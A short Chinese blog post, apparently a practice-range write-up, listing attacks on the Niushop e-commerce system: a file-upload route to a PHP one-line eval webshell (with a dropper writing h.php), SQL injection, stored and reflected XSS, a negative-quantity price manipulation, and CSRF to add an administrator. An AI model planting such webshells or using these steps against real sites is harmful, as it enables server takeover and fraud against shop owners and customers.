文件上传漏洞
先注册一个账号
来到个人信息修改个人头像
选择我们的马
#一句话(不想麻烦的选择一句话也可以)
<?php @eval($_POST["cmd"]);?>
#生成h.php文件
<?php
fputs(fopen('h.php','w'),'<?php @eval($_POST["cmd"]);?>');
?>
在BP中进行抓包,改为1.php
右键图片在网页新建打开图片标签;就能获取路径
去蚁剑连接生成的h.php就行
SQL注入漏洞
基于布尔时间盲注
第一个存在点
sqlmap跑出来的
第二个存在点
二次外带注入
XSS漏洞
存储型
1.后台-->设置-->基础设置-->商城第三方统计代码
来到首页就会弹窗
2.后台-->网站--->广告位
反射型
1.后台--微信--消息管理素材管理-->添加消息存储-->标题
0元购
在商品页面抓包
通过改变数量改变价格
在放行一次修改数量为-1
后面全部放行就OK了
CSRF漏洞
下载源码;制作添加管理员链接
添加管理员用户
BP抓包;制作SCRF
复制下来制作链接
admin管理员在已登录的状态点击我们的链接
标签:--,漏洞,开源,管理员,靶场,php,链接,抓包,niushop From: https://blog.csdn.net/yjh20041010/article/details/144676062